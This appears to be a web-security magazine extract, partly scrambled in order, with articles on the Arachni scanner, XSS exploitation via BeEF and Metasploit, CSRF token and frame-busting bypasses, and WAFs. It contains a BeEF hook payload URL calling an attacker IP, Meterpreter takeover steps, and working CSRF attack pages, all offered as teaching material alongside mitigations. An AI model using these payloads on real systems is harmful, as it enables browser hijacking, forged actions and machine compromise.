• WAF (Web Application Firewall) Detector – Establishes a baseline of normal behaviour and uses rDiff analysis to determine whether malicious inputs cause any behavioural changes.
• Metamodules – Loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle – Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice – Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity – Reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.
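The rDiff idea used by the WAF Detector plug-in can be approximated with a toy sketch: responses to benign probes establish a baseline of normal variation, and a malicious probe whose response diverges well beyond that baseline suggests something (such as a WAF) reacted. This illustrates the idea only; it is not Arachni's implementation, and the dissimilarity metric and margin are arbitrary choices.

```ruby
# Crude dissimilarity: fraction of differing character positions,
# plus the length difference, normalised by the longer response.
def distance(a, b)
  len = [a.length, b.length].max
  return 0.0 if len.zero?
  min = [a.length, b.length].min
  diff = (0...min).count { |i| a[i] != b[i] } + (len - min)
  diff.to_f / len
end

# Flag a behavioural change when the malicious response diverges from
# the baseline by more than the benign responses diverge from each
# other (plus a margin).
def behavioural_change?(benign, malicious, margin = 0.2)
  baseline = distance(benign[0], benign[1])
  distance(benign[0], malicious) > baseline + margin
end

benign = ["<html>hello bob</html>", "<html>hello alice</html>"]
puts behavioural_change?(benign, "<html>403 Forbidden by WAF</html>")  # true
puts behavioural_change?(benign, "<html>hello carol</html>")           # false
```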
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run it natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands from Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. If you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3, some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First, we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update RubyGems and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands from Listing 2 in the Cygwin shell (note: these are the same commands as with the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows Explorer to browse to C:\cygwin\bin, right-click ash.exe and choose Run as administrator. Enter in ash:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash
Light My Fire
How you fire up Arachni depends on whether you want to use the new web GUI (available since version 0.3) or simply run everything through the command-line interface. Note that the current web GUI does not support all of the functionality that is available from the command line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1. Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues have been detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAFs), perform dictionary attacks, and more.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a pattern to include modules, or exclude modules by prefixing the pattern with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the term of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated
# from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run( )
        path = get_path( page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces or confidential
                    information are exposed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans), as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
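The per-directory check that Listing 3 performs can be sketched outside the Arachni framework as well. The following is a minimal, framework-independent Ruby sketch; the name discover_directories and the injected exists callable are illustrative, not part of the Arachni API (in Arachni itself that role is played by log_remote_directory_if_exists):

```ruby
require 'set'

# Framework-independent sketch of the forced-browsing logic in Listing 3.
# `exists` is any callable answering whether a URL responds, so the logic
# can be exercised without network access.
def discover_directories(base_url, wordlist, exists)
  found = Set.new
  wordlist.each do |dirname|
    next if dirname.include?('.')      # skip file-like entries, as the module does
    url = "#{base_url}#{dirname}/"
    found << url if exists.call(url)   # would be reported (and fed to the Trainer)
  end
  found
end

# Usage with a stubbed existence check:
stub = ->(url) { url.include?('admin') }
p discover_directories('http://www.example.com/', ['admin', 'img.png', 'tmp'], stub)
```

Injecting the existence check also makes the logic trivially testable, which the real module achieves by delegating to the framework.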
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup: this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).

A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page
<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2: BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.

Figure 1: User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box appearing on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text input, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).

BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball and copy it into your web server directory
Figure 3: Connection with BeEF controller
Figure 4: What the attacker will see
Figure 5: What the victim will see
Figure 6: Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.

Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).

Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).

Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7: Detecting plugins on the user's browser
Figure 8: Starting Metasploit
Figure 9: The jobs command
Figure 10: Metasploit after clicking Send Now
Figure 11: Meterpreter window - screenshot 1
Figure 12: Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything that you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point of time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install these on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:

Figure 13: Meterpreter window - screenshot 3

• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White list and black list filtering can also be used to completely disallow specific characters in user input fields.
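The output-encoding advice above can be illustrated with a short sketch, here in Ruby using the standard library's CGI.escapeHTML (the function render_search_result is a made-up name mirroring the vulnerable PHP page shown earlier, not code from the article):

```ruby
require 'cgi'

# Encode user-controlled input before reflecting it, so injected markup
# is rendered as inert text instead of being executed by the browser.
def render_search_result(user_input)
  "The parameter passed is #{CGI.escapeHTML(user_input)}"
end

puts render_search_result("<script>alert(document.domain)</script>")
# The dangerous characters are emitted as &lt;script&gt;... so the payload no longer runs.
```

The same idea applies in any language: encode at output time, in the context (HTML body, attribute, JavaScript, URL) where the value is used.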
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvind.doraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.

CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).

Useless Defenses
The following are the weak defenses:

• Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: Some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
• Requiring multi-step transactions: CSRF attacks can perform each step in order.

Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text from the CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1: HTML code used to bypass protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
       www.evil.com" >
<input type="submit" >
</form>
<script>document.Form.submit()</script>
</div>
index.php (Victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (Victim website)

In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):

index.php (Evil website)

For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;

A browser's settings are not hard to modify. So the best way for web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, to compare them after the page form submission.
Subverting one-time tokens is usually attempted with brute force attacks. Brute forcing attacks against one-time tokens are useful only if the mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2: Wrong token

<?php session_start()?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
    $token = md5(uniqid(rand(),true));
    $_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token?>">
</form>
</body>
</html>
Listing 3: Correct token

<?php
session_start();
if($_SESSION['token'] == $_POST['token'])
{
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt","a");
    fwrite($file,"$message\r\n");
    fclose($file);
}
else
{
    echo "Bad request";
}
?>
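The token round trip of Listings 2 and 3 can be condensed into a short language-neutral sketch. The Ruby below uses a plain Hash in place of the PHP session, and additionally consumes the token on use so it really is one-time (issue_token and valid_request? are illustrative names, not from the article's code):

```ruby
require 'securerandom'

# One-time token round trip: the server stores a random token in the
# session and embeds the same value in the form; on submission the two
# must match, and the token is deleted so it cannot be replayed.
def issue_token(session)
  session[:token] = SecureRandom.hex(16)
end

def valid_request?(session, params)
  expected = session.delete(:token)   # consume: valid at most once
  !expected.nil? && params[:token] == expected
end

session = {}
form_token = issue_token(session)
puts valid_request?(session, token: form_token)   # => true  (legitimate post)
puts valid_request?(session, token: form_token)   # => false (replay rejected)
```

Note that the PHP listing above does not delete the token after the comparison; consuming it on use is the stricter variant of the same defense.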
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.

Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>

Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if( self == top ) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker browses the webpage with the JavaScript disabled option in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4: Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide. They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or are simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
